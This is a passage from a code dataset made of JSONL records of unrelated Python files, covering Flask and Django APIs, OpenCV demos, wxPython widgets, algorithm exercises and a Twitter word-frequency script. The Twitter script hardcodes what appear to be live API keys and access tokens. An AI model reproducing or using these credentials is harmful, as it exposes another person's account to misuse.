{\"total_ac\": -1}\n :return:None\n \"\"\"\n users = vj['user'].find().sort([('total_ac', -1), ('last_submit_time', -1)])\n cnt = 1\n for user in users:\n print(cnt, user.get('total_ac'), user.get('last_submit_time'))\n vj['user'].find_and_modify({'_id': user['_id']}, {'$set': {'rank': cnt}})\n cnt += 1\n\n\ndef task():\n match_info_multithreading()\n rank()\n\n\ndef main():\n schedule.every(1).day.at(\"01:00\").do(task)\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sduwh/vj","sub_path":"ranker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"28306806174","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport itertools\nimport collections\nfrom send_mongo import monsendmany\n\nimport tweepy as tw\nimport nltk\nfrom nltk.corpus import stopwords\nimport re\nimport networkx\n\nimport warnings\nimport pymongo\n\n\n# 3.md: regular expressions #\ndef remove_url(txt):\n return \" \".join(re.sub(\"([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", txt).split())\n\n\ndef main():\n warnings.filterwarnings(\"ignore\")\n\n sns.set(font_scale=1.5)\n sns.set_style(\"whitegrid\")\n\n # 1.md: authentication #\n\n # input your credentials here\n consumer_key = \"eqLHuY0uTBa0rCfnwUlfheGPc\"\n consumer_secret = \"2BqhyDJwdg2K6DWzcSEX6OKDOExiS5zv2p1inA0lcNDvQT7GzL\"\n access_token = \"3360443532-TOXKjRYl00GYYSNwAxP6lSwLTfjxBtRTSnTGXqA\"\n access_token_secret = \"yST3YcfLrkqJxjqg3T6JybZiaYGteWGvixIahVjMRb01D\"\n\n auth = tw.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n\n # 2.md: searching #\n search_term = \"#COVID19\"\n\n tweets = tw.Cursor(api.search,\n q=search_term,\n lang=\"en\",\n since='2020-5-7').items(1000)\n\n all_tweets = [tweet.text for tweet in tweets]\n\n print(all_tweets[:5])\n all_tweets_no_urls = [remove_url(tweet) for tweet in all_tweets]\n print(all_tweets_no_urls[:5])\n\n # 4.md - Generating list of most common words into DataFrame #\n\n # Split the words from one tweet into unique elements\n print(all_tweets_no_urls[0].split())\n\n # Split the words from one tweet into unique elements\n print(all_tweets_no_urls[0].lower().split())\n\n # Create a list of lists containing lowercase words for each tweet\n words_in_tweet = [tweet.lower().split() for tweet in all_tweets_no_urls]\n print(words_in_tweet[:2])\n\n # List of all words across tweets\n stop_words = set(stopwords.words('english'))\n all_words_no_urls = list(itertools.chain(*words_in_tweet))\n filtered_sentence = []\n\n for w in all_words_no_urls:\n if w not in stop_words:\n filtered_sentence.append(w)\n # Create counter\n counts_no_urls = collections.Counter(filtered_sentence)\n\n print(counts_no_urls.most_common(15))\n\n clean_tweets_no_urls = pd.DataFrame(counts_no_urls.most_common(30),\n columns=['content', 'content_count'])\n\n print(clean_tweets_no_urls.head())\n monsendmany(clean_tweets_no_urls, \"Newyork_tophash\")\n # 5.md - plotting horizontal bar graph #\n\n fig, ax = plt.subplots(figsize=(8,8))\n # Plot horizontal bar graph\n clean_tweets_no_urls.sort_values(by='count').plot.barh(x='words',\n y='count',\n ax=ax,\n color=\"purple\")\n\n ax.set_title(\"Common Words Found in Tweets\")\n\n plt.show()\n\n\nmain()","repo_name":"TommyCChen/E6889-project","sub_path":"Final/Top trending.py","file_name":"Top trending.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35307719383","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef back_project_demo(roi_img,raw_img): #直方图方向查找\n hsv = cv.cvtColor(roi_img, cv.COLOR_BGR2HSV)\n raw_hsv = cv.cvtColor(raw_img, cv.COLOR_BGR2HSV)\n roi_hist = cv.calcHist([hsv], [0, 1], None, [400, 400], [0, 180, 0, 256])\n cv.normalize(roi_hist,roi_hist,0,255,cv.NORM_MINMAX)\n dst = cv.calcBackProject([raw_hsv],[0,1],roi_hist,[0, 180, 0, 256],1)\n cv.imshow('backprojrct_demo',dst)\n\n\n# 直方图反向投影\ndef hist2d_demo(image):\n \"\"\"\n 2d直方图的制作:(x:s y:h)\n 1.转换到hsv色彩空间\n 2.cv.calHist统计直方图 p1:img必须方括号\n p2:用什么通道\n p3:遮罩\n p4:多少哥直方柱,或者理解为x轴或y轴坐标的尺度比例\n p5:ranges参数表示像素值的范围,通常[0,256]。\n 此外,假如channels为[0,1],ranges为[0,256,0,180],则代表0通道范围是0-256,1通道范围0-180。\n\n \"\"\"\n hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)\n hist = cv.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])\n plt.imshow(hist,interpolation='nearest')\n #cv.imshow('hist2d_demo',hist)\n\n\nimg = cv.imread('./image/load_sunny.jpg', 1) # blue green red\nimg_roi = cv.imread('./image/load_sunny_roi.jpg', 1)\nback_project_demo(img_roi,img)\n# #plt.xlim([0, 256])\n#cv.imshow('img', img)\n#hist2d_demo(img)\n","repo_name":"xzltc/OpenCV_study","sub_path":"class_11.py","file_name":"class_11.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10678698087","text":"from Atmexception import depositeerror,withdrawerror,Insuffunderror\nbal=500.00\ndef deposite():\n damt=float(input(\"enter a deposite amount:\"))\n if(damt<=0):\n raise depositeerror\n else:\n global bal\n bal=bal+damt\n print(\"u r acount credited with inr:{}\",format(damt))\n print(\"now u r acount balance after deposite:{}\".format(bal))\ndef withdraw():\n global bal\n wamt = float(input(\"enter a deposite amount:\"))\n if (wamt <= 0):\n raise withdrawerror\n elif((wamt+500)>bal):\n raise Insuffunderror\n else:\n bal=bal-wamt\n print(\"u r acount debited with inr:{}\".format(wamt))\n print(\"now u r acount balance after debitated:{}\".format(bal))\ndef balenq():\n print(\"now u r acount balance eq:{}\".format(bal))\n\n","repo_name":"Shaikmominsaratajbegum/c-language","sub_path":"PycharmProjects/pythonProject2exceptions/ATMoperation.py","file_name":"ATMoperation.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"46227672088","text":"\"\"\"61070023 Ruleofthree\"\"\"\ndef main(num, bcost, bsize, bratio):\n \"\"\"This problem want to know, what is the best price with the biggest size\"\"\"\n for _ in range(num):\n cost = float(input())\n size = float(input())\n ratio = size/cost\n if ratio >= bratio:\n bratio = ratio\n bcost = cost\n bsize = size\n print(\"%.2f %.2f\" % (bcost, bsize))\n\nmain(int(input()), 0, 0, 0)\n","repo_name":"ZeroHX/PSIT2018","sub_path":"64.ruleofthree.py","file_name":"64.ruleofthree.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12744214674","text":"import flask_restplus\n\nfrom producer.views import api_v1_bp as api_bp\napi = flask_restplus.Api(api_bp,\n title=\"消防API\",\n description=\"API\",\n contact=\"Tianjin Huitong Technology Co., Ltd\",\n contact_email=\"support@huitong-tech.com\",\n version=\"1.0\", )\nfrom .mqtt import api as mqtt_ns\napi.add_namespace(mqtt_ns,path='/mqtt')","repo_name":"tujiaan/PythonBase","sub_path":"producer/views/api_v1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29773684689","text":"'''Напишите функцию modify_list(l), которая принимает на вход список целых чисел, \r\nудаляет из него все нечётные значения, а чётные нацело делит на два. Функция не должна\r\nничего возвращать, требуется только изменение переданного списка, например:'''\r\n\r\n\r\ndef modify_list(l):\r\n b=[]\r\n for i in l:\r\n b.append(i)\r\n l.clear()\r\n for i in range(len(b)):\r\n if b[i]%2==0:\r\n c=b[i]//2\r\n l.append(c)\r\n# Старый способ\r\n\r\n\r\n\r\ndef modify_list(l):\r\n x=0\r\n while x h:\n\t\t\theight = h_bmp\n\t\telse:\n\t\t\theight = h\n\t\treturn width, height, True\n\t\n\tdef DrawLabel(self, dc, width, height, dx=0, dy=0):\n\t\tbmp = self.bmpLabel\n\t\tif bmp is not None: # if the bitmap is used\n\t\t\tif self.bmpDisabled and not self.IsEnabled():\n\t\t\t\tbmp = self.bmpDisabled\n\t\t\tif self.bmpFocus and self.hasFocus:\n\t\t\t\tbmp = self.bmpFocus\n\t\t\tif self.bmpSelected and not self.up:\n\t\t\t\tbmp = self.bmpSelected\n\t\t\tbw, bh = bmp.GetWidth(), bmp.GetHeight()\n\t\t\tif not self.up:\n\t\t\t\tdx = dy = self.labelDelta\n\t\t\thasMask = bmp.GetMask() is not None\n\t\telse:\n\t\t\tbw = bh = 0 # no bitmap -> size is zero\n\t\t\thasMask = False\n\t\t\n\t\tdc.SetFont(self.GetFont())\n\t\tif self.IsEnabled():\n\t\t\tdc.SetTextForeground(self.GetForegroundColour())\n\t\telse:\n\t\t\tdc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))\n\t\t\n\t\tlabel = self.GetLabel()\n\t\ttw, th = dc.GetTextExtent(label) # size of text\n\t\tif not self.up:\n\t\t\tdx = dy = self.labelDelta\n\t\t\n\t\tpos_y = (width - bw - th) / 2 + dy # adjust for bitmap and text to centre\n\t\tif bmp is not None:\n\t\t\tdc.DrawBitmap(bmp, (width - bw) / 2 + dx, pos_y, hasMask) # draw bitmap if available\n\t\t\tpos_y = pos_y + 2 # extra spacing from bitmap\n\t\t\n\t\tdc.DrawText(label, (width - tw) / 2 + dx, pos_y + dy + bh) # draw the text\n\t\n\tdef OnGainFocus(self, event):\n\t\t\"\"\"\n\t\tHandles the ``wx.EVT_SET_FOCUS`` event for :class:`GenButton`.\n\n\t\t:param event: a :class:`wx.FocusEvent` event to be processed.\n\t\t\"\"\"\n\t\tself.SetWindowStyleFlag(wx.BORDER_DEFAULT)\n\t\tself.SetBezelWidth(1)\n\t\tself.SetUseFocusIndicator(True)\n\t\tGenBitmapButton.OnGainFocus(self, event)\n\t\n\tdef OnLoseFocus(self, event):\n\t\t\"\"\"\n\t\tHandles the ``wx.EVT_KILL_FOCUS`` event for :class:`GenButton`.\n\n\t\t:param event: a :class:`wx.FocusEvent` event to be processed.\n\t\t\"\"\"\n\t\tself.SetWindowStyleFlag(self.original_style)\n\t\tself.SetUseFocusIndicator(False)\n\t\tself.SetBezelWidth(0)\n\t\tGenBitmapButton.OnLoseFocus(self, event)\n\t\n\tdef DrawBezel(self, dc, x1, y1, x2, y2):\n\t\t# draw the upper left sides\n\t\tif self._mouse_over:\n\t\t\tdc.SetPen(wx.Pen(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT), 2))\n\t\telse:\n\t\t\tdc.SetPen(wx.Pen(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT), 1))\n\t\t\n\t\tfor i in range(self.bezelWidth):\n\t\t\n\t\t\tif self._mouse_over:\n\t\t\t\tdc.DrawRoundedRectangle(1, 1, self.GetSize().x - 3, self.GetSize().y - 3, 4)\n\t\t\telse:\n\t\t\t\tdc.DrawRoundedRectangle(0, 0, self.GetSize().x - 2, self.GetSize().y - 2, 5)\n","repo_name":"domdfcoding/GunShotMatch","sub_path":"GuiV2/GSMatch2_Core/custom_bitmap_button.py","file_name":"custom_bitmap_button.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41119015239","text":"import random\nfrom itertools import chain, combinations\nimport sys\n\n\ndef gen_prime(alphabet_size):\n primes = []\n count = 0\n for num in range(2, 100):\n if num > 1:\n for i in range(2, num):\n if (num % i) == 0:\n break\n else:\n primes.append(num)\n count += 1\n if count == alphabet_size:\n return list(primes)\n\n\ndef gen_power_set(primes):\n s = list(primes)\n multiply = []\n power_set = list(chain.from_iterable(combinations(s, r) for r in range(len(s) + 1)))\n for i in range(2 ** len(primes)):\n if len(power_set[i]) > 1:\n count = 1\n for j in range(len(power_set[i])):\n count *= power_set[i][j]\n multiply.append(count)\n return list(multiply)\n\n\ndef gen_solid_string(length, alphabet_size):\n text = []\n alphabet = gen_prime(alphabet_size)\n for i in range(length):\n text.append(alphabet[random.randint(0, alphabet_size - 1)])\n return text\n\n\ndef gen_indet_string(text, alphabet_size, num):\n alphabet = gen_prime(alphabet_size)\n indet_list = gen_power_set(alphabet)\n for i in range(0, num):\n pos = random.randint(0, len(text) - 1)\n if text[pos] in alphabet:\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n else:\n pos = random.randint(0, len(text) - 1)\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n return text\n\n\ndef gen_indet_pattern(text, alphabet_size, num):\n alphabet = gen_prime(alphabet_size)\n indet_list = gen_power_set(alphabet)\n #text[len(text) - 1] = indet_list[random.randint(0, len(indet_list) - 1)]\n for i in range(0, num):\n pos = random.randint(0, len(text) - 2)\n if text[pos] in alphabet:\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n else:\n pos = random.randint(0, len(text) - 1)\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n return text\n\n\ndef generate_text_pattern(\n text_length, text_indet_letters, pattern_length, pattern_indet_letters, alphabet\n):\n text = gen_solid_string(text_length, alphabet)\n text = gen_indet_string(text, alphabet, text_indet_letters)\n pattern = gen_solid_string(pattern_length, alphabet)\n pattern = gen_indet_pattern(pattern, alphabet, pattern_indet_letters)\n f = open(\n \"demofile_pattern\", \"w\"\n )\n for i in pattern:\n f.write(str(i) + \",\")\n f.close()\n\n f2 = open(\"demofile_text\", \"w\")\n for i in text:\n f2.write(str(i) + \",\")\n f2.close()\n\n\nargs = sys.argv[1:]\nif len(args) != 5:\n print(\"Usage: python3 script_name text_length k1 pattern_length k2 sigma\")\n sys.exit(1)\n\nval1 = int(args[0])\nval2 = int(args[1])\nval3 = int(args[2])\nval4 = int(args[3])\nval5 = int(args[4])\n\n\ngenerate_text_pattern(val1, val2, val3, val4, val5)\n","repo_name":"dehhganii/Practical_KMP_BM_Indet","sub_path":"create_strings.py","file_name":"create_strings.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35791497057","text":"sal = float(input())\n\nif sal > 0 and sal <= 2000:\n print('Isento')\nelif sal > 2000 and sal <= 3000:\n sal_novo = ((sal-2000) * 8) / 100\n print('R$ {:.2f}'.format(sal_novo))\nelif sal <= 4500 and sal > 3000:\n sal_novo = (((sal - 3000) * 18) / 100) + (1000*0.08)\n print('R$ {:.2f}'.format(sal_novo))\nelse:\n sal_novo = (((sal - 4500) * 28) / 100) + (1000*0.08) + (1500 * 0.18)\n print('R$ {:.2f}'.format(sal_novo))\n\n#Imprima o texto \"R$\" seguido de um espaço e do valor total devido de Imposto de Renda, com duas casas após o ponto. Se o valor de entrada for menor ou igual a 2000, deverá ser impressa a mensagem \"Isento\".","repo_name":"renatoryu/BeecrowdPython","sub_path":"Pós_Aula_04/Bee_1051.py","file_name":"Bee_1051.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38843261634","text":"from flask import Flask\n\nfrom .models import Admin\nfrom .routes import mainBP, actionBP\nfrom .extensions import db, csrf\nimport secrets\nfrom flask_login import LoginManager\nfrom werkzeug.security import generate_password_hash\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True, template_folder=\"ui/templates\", static_folder=\"ui/static\")\n app.config.from_object(\"config.Config\")\n\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'main.home'\n db.init_app(app)\n csrf.init_app(app)\n app.config[\"SESSION_SQLALCHEMY\"] = db\n app.config['SECRET_KEY'] = secrets.token_hex(16)\n\n app.register_blueprint(mainBP)\n app.register_blueprint(actionBP)\n\n with app.app_context():\n db.create_all()\n\n @login_manager.user_loader\n def load_user(user_id):\n return Admin.query.get(int(user_id))\n\n return app\n","repo_name":"FalconsForTheFuture/tasklist","sub_path":"tasklist/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1625556976","text":"# -*- coding:utf-8; -*-\n\"\"\"\n解题思路:\n首先通过观察发现:不管最大矩形怎么画,它的高度肯定等于某个柱子的高度(不考虑有等高柱子)。这个结论可以用反证法证明。\n\n那么,问题就转变为,只要找到每个柱子作为高度时候的最大矩形,然后取其中最大值就对了,显然,这一层的时间复杂度是O(n)。\n\n那么,一个柱子作为高度的最大矩形具有什么特点呢?观察就可以得出:两侧的柱子都比他高!同样反证法可以证明:如果两侧柱子都比他矮,那么以它为高度画出的矩形与题意不合。\n\n那么,矩形面积=高度*宽度,高度已经确定(当前柱子的高度H)。宽度如何确定?继续观察,很明显,两侧的边界就是 *两侧出现的第一个低于H的柱子* 。这一步同样可以反证法。\n\n最终,这个问题就转化为,在数组a中,怎么找到第i位数字两侧小于a[i]的位置。典型的单调栈。\n\n\"\"\"\n\n\nclass Solution:\n def largestRectangleArea(self, heights):\n maxArea, stack = 0, []\n for i, v in enumerate(heights):\n while stack and heights[stack[-1]] > v: # 单调递增栈,计算栈顶元素的左右边界\n h = heights[stack.pop()] # 矩形高度\n l = stack[-1] if stack else -1 # 栈顶下面的元素是栈顶元素的左边界\n r = i # 当前入栈元素是栈顶元素的右边界\n area = h * (r - l - 1) # 计算面积\n maxArea = max(maxArea, area)\n\n stack.append(i)\n\n # 数组中剩余的元素是单调递增的,这些元素右侧都没与比他们矮的元素了\n r = len(heights)\n while stack:\n h = heights[stack.pop()]\n l = stack[-1] if stack else -1\n area = h * (r - l - 1)\n maxArea = max(maxArea, area)\n\n return maxArea\n\n\nif __name__ == \"__main__\":\n heights = [2, 1, 5, 6, 2, 3]\n s = Solution()\n print(s.largestRectangleArea(heights))\n","repo_name":"phenix3443/leetcode","sub_path":"84-largest-rectangle-in-histogram/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31324891864","text":"from Consistent_Root import *\n\nfrom decimal import Decimal, getcontext\ncount = 0\nindex = 0\nfor i in range(401):\n x = 1 - 2*(i % 2)\n for j in range(401):\n index += 1\n a, b = c_square_root(Decimal((i - 200)/100), Decimal(x*(j - 200)/100))\n if index > 17435 and index < 17431:\n count += 1\n print(f\"{a} {b} {Decimal((i - 200)/100)} {Decimal(x*(j - 200)/100)}\")\n elif count == 5:\n break\n\n # if i == 0 and j == 0:\n # lasst = a\n # else:\n # if abs(lasst - a) > .004:\n # print(f\"{i} {j}\")\n # lasst = a\n\n if count == 5:\n break","repo_name":"EloMalakhi/Polynomialic-formulas","sub_path":"Standardization_cSquareRoot.py","file_name":"Standardization_cSquareRoot.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"115762027","text":"import os\nimport struct\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Any, Dict, Iterable, Optional, Tuple, Type\n\nimport pytz\nfrom pydantic import ConstrainedDecimal, ConstrainedStr\n\nfrom ..backend import Backend\nfrom .binary_struct import BinaryStruct\nfrom .timestream_file import TimeStreamFile\n\nif TYPE_CHECKING:\n from schema import TimeSeries\n\n\nFILESYSTEM_FILEPATH_FORMAT_DEFAULT = \"{table}/{dimensions}/{year}/{month:02d}/{day:02d}\"\n\n\nclass FileSystemBackend(Backend):\n root: Path\n endianess: str = \"<\"\n opened_files: Dict[str, \"TimeStreamFile\"]\n structs: Dict[Type[\"TimeSeries\"], \"BinaryStruct\"]\n\n def prepare_type(self, data_type: Type[\"TimeSeries\"]) -> None:\n if data_type not in self.structs:\n self.structs[data_type] = BinaryStruct(data_type, self.endianess)\n\n def __init__(self):\n root = os.environ.get(\"TIME_SERIES_FS_ROOT\", None)\n if root is None:\n raise ValueError(\"Please specify TIME_SERIES_FS_ROOT\")\n self.filepath_format = os.environ.get(\n \"TIME_SERIES_FS_FILEPATH_FORMAT\", FILESYSTEM_FILEPATH_FORMAT_DEFAULT\n )\n\n self.root = root\n if not os.path.exists(root):\n os.makedirs(root)\n\n self.opened_files = {}\n self.structs = {}\n\n def persist(self, point: \"TimeSeries\") -> None:\n print(f\"persisting {point.timestamp}\")\n\n binary_struct = self.structs[type(point)]\n filename = self.filename(point)\n\n timestream_file = self.timestream_file(filename, binary_struct.fmt)\n timestream_file.append(binary_struct.encode_point(point))\n\n def query(\n self,\n cls: Type[\"TimeSeries\"],\n dimensions: Dict[str, Any],\n start_time: datetime,\n end_time: Optional[datetime] = None,\n ) -> Iterable[\"TimeSeries\"]:\n lookup = TimeStreamFileLookup(cls, dimensions, start_time, end_time)\n\n binary_struct = self.structs[cls]\n files_queue = []\n\n for root, _, files in os.walk(self.root + \"/\" + cls.Meta.table):\n for file in files:\n filename = root + \"/\" + file\n if lookup.should_visit_file(filename):\n files_queue.append(filename)\n\n files_queue.sort()\n for filename in files_queue:\n print(\"traversing\", filename)\n timestream_file = TimeStreamFile(filename, binary_struct.fmt)\n for binary_entry in timestream_file.entries(end_time):\n yield binary_struct.decode_point(binary_entry)\n return []\n\n def filename(self, point: \"TimeSeries\") -> Path:\n dimensions = []\n if \"dimensions\" in self.filepath_format:\n for dimension_name in point.Meta.dimensions:\n dimensions.append(dimension_name)\n dimensions.append(str(point.data.dimensions[dimension_name]))\n\n file_dir = Path(\n self.filepath_format.format(\n table=point.Meta.table,\n year=point.timestamp.year,\n month=point.timestamp.month,\n day=point.timestamp.day,\n dimensions=\"/\".join(dimensions),\n )\n )\n return self.root / file_dir\n\n def timestream_file(self, path: str, struct_fmt: str) -> \"TimeStreamFile\":\n if path not in self.opened_files:\n self.opened_files[path] = TimeStreamFile(path, struct_fmt)\n\n return self.opened_files[path]\n\n def commit(self):\n for _, file_obj in self.opened_files.items():\n file_obj.commit()\n\n\nclass TimeStreamFileLookup:\n def __init__(\n self,\n cls: Type[\"TimeSeries\"],\n dimensions: Dict[str, Any],\n start_time: datetime,\n end_time: Optional[datetime] = None,\n ):\n dimensions_path = []\n for dimension_name in cls.Meta.dimensions:\n dimensions_path.append(dimension_name)\n dimensions_path.append(str(dimensions[dimension_name]))\n\n self.dimensions_path_str = \"/\".join(dimensions_path)\n self.start_time = start_time\n self.end_time = end_time\n\n def should_visit_file(self, filename: str) -> bool:\n filename_parts = filename.split(\"/\")\n date_parts = list(map(int, filename_parts[-3:]))\n # print(date_parts)\n file_date = datetime(*date_parts).replace(tzinfo=pytz.utc)\n should_visit = (\n self.dimensions_path_str in filename and file_date >= self.start_time\n )\n if self.end_time is not None:\n should_visit = should_visit and file_date < self.end_time + timedelta(\n days=1\n )\n\n return should_visit\n","repo_name":"toudi/pensieve","sub_path":"backends/filesystem/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"9577075763","text":"import time\nimport random\n\ndef fibonacci(n):\n if n <= 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n \nif __name__ == '__main__':\n n = random.randint(15, 35)\n start_time = time.time()\n result = fibonacci(n)\n end_time = time.time()\n print(f'The {n}th term in the fibonacci sequence is {result}')\n print(f'Time taken: {end_time - start_time:.6f} seconds')","repo_name":"JaylenConway/intermediate_exercises2","sub_path":"exercise_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23516228121","text":"from django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter, SearchFilter\nfrom v1.utility.models.utility_master import get_utility_by_id_string\nfrom v1.commonapp.views.custom_exception import CustomAPIException, InvalidAuthorizationException, InvalidTokenException\nfrom v1.commonapp.views.pagination import StandardResultsSetPagination\nfrom v1.consumer.models.consumer_service_contract_details import get_consumer_service_contract_detail_by_id_string\nfrom rest_framework import status, generics\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom api.messages import *\nfrom master.models import get_user_by_id_string\nfrom v1.commonapp.common_functions import get_user_from_token, is_token_valid, is_authorized\nfrom v1.commonapp.views.logger import logger\nfrom v1.consumer.models.consumer_master import get_consumer_by_id_string\nfrom v1.consumer.serializers.consumer_offer_detail import ConsumerOfferDetailSerializer, \\\n ConsumerOfferDetailListSerializer\nfrom v1.userapp.decorators import is_token_validate, role_required\nfrom v1.consumer.models.consumer_offer_detail import ConsumerOfferDetail as ConsumerOfferModel\nfrom v1.commonapp.common_functions import is_authorized, is_token_valid, get_user_from_token, check_user\n\n# API Header\n# API end Point: api/v1/consumer/:id_string/offer-detail\n# API verb: POST\n# Package: Basic\n# Modules: S&M, Consumer Care, Consumer Ops\n# Sub Module: Consumer\n# Interaction: Add consumer offer detail\n# Usage: Add\n# Tables used: Consumer offer detail\n# Author: Rohan\n# Created on: 25/01/2021\n\n\nclass ConsumerOfferDetail(GenericAPIView):\n\n @is_token_validate\n # @role_required(CONSUMER_OPS, CONSUMER_OPS_CONSUMER, EDIT)\n def post(self, request, id_string):\n try:\n # user_id_string = get_user_from_token(request.headers['Authorization'])\n # user = get_user_by_id_string(user_id_string)\n user = check_user(request.headers['Authorization'])\n consumer = get_consumer_by_id_string(id_string)\n serializer = ConsumerOfferDetailSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n consumer_offer_detail = serializer.create(serializer.validated_data, consumer, user)\n if request.data['consumer_service_contract_id_string']:\n consumer_service_contract_detail_obj = get_consumer_service_contract_detail_by_id_string(request.data['consumer_service_contract_id_string'])\n consumer_offer_detail.consumer_service_contract_detail_id = consumer_service_contract_detail_obj.id\n consumer_offer_detail.save()\n\n view_serializer = ConsumerOfferDetailSerializer(instance=consumer_offer_detail, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULT: view_serializer.data,\n }, status=status.HTTP_201_CREATED)\n else:\n return Response({\n STATE: ERROR,\n RESULT: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger().log(e, 'HIGH', module='Consumer Ops', sub_module='Consumer')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULT: str(e),\n }, status=res.status_code)\n\n\nclass ConsumerOfferDetailList(generics.ListAPIView):\n try:\n serializer_class = ConsumerOfferDetailListSerializer\n pagination_class = StandardResultsSetPagination\n filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)\n filter_fields = ('tenant__id_string',)\n ordering_fields = ('tenant',)\n search_fields = ('tenant__name',)\n\n def get_queryset(self):\n response, user_obj = is_token_valid(self.request.headers['Authorization'])\n if response:\n if is_authorized(1, 1, 1, user_obj):\n utility = get_utility_by_id_string(self.request.query_params['utility_id_string'])\n queryset = ConsumerOfferModel.objects.filter(utility=utility, is_active=True)\n if \"consumer_id\" in self.request.query_params:\n consumer = get_consumer_by_id_string(self.request.query_params['consumer_id'])\n queryset = queryset.filter(consumer_id=consumer.id)\n if queryset:\n return queryset\n else:\n raise CustomAPIException(\"Consumers offer details not found.\", status.HTTP_404_NOT_FOUND)\n else:\n raise InvalidAuthorizationException\n else:\n raise InvalidTokenException\n except Exception as e:\n logger().log(e, 'MEDIUM', module='Consumer ops', sub_module='Consumer')","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/consumer/views/consumer_offer_detail.py","file_name":"consumer_offer_detail.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36775340347","text":"import keyword\r\nfrom collections import OrderedDict\r\nimport os\r\nfrom pathlib import Path\r\nfrom typing import Dict, Sequence, Set\r\n\r\nfrom dmtgen.common.blueprint_attribute import BlueprintAttribute\r\nfrom dmtgen.common.package import Blueprint, Package\r\n\r\ntypes = {\"number\": \"float\", \"double\": \"float\", \"string\": \"str\", \"char\": \"str\",\r\n \"integer\": \"int\", \"short\": \"int\", \"boolean\": \"bool\"}\r\n\r\ndefault_values = {\"float\": 0.0, \"str\": None, \"int\": 0, \"bool\": False}\r\n\r\nsetters = {\"float\": \"float(value)\", \"str\": \"value\", \"int\": \"int(value)\", \"bool\": \"bool(value)\"}\r\n\r\ndef create_model(blueprint: Blueprint, package_name: str, package_path: str):\r\n model = {}\r\n name = blueprint.name\r\n imports = OrderedDict()\r\n cross_references = OrderedDict()\r\n model[\"name\"] = name\r\n super_classes = __find_super_classes(blueprint)\r\n model[\"super_classes\"] = __to__super_classes(super_classes)\r\n model[\"package\"] = package_name\r\n model[\"root_package\"] = package_name\r\n model[\"meta_package\"] = package_name + \".blueprints\" + package_path\r\n model[\"schema_package\"] = package_name + \".schema\" + package_path +\".schemas\"\r\n model[\"filename\"] = name.lower()\r\n model[\"version\"] = 1\r\n model[\"description\"] = blueprint.description\r\n type_name = 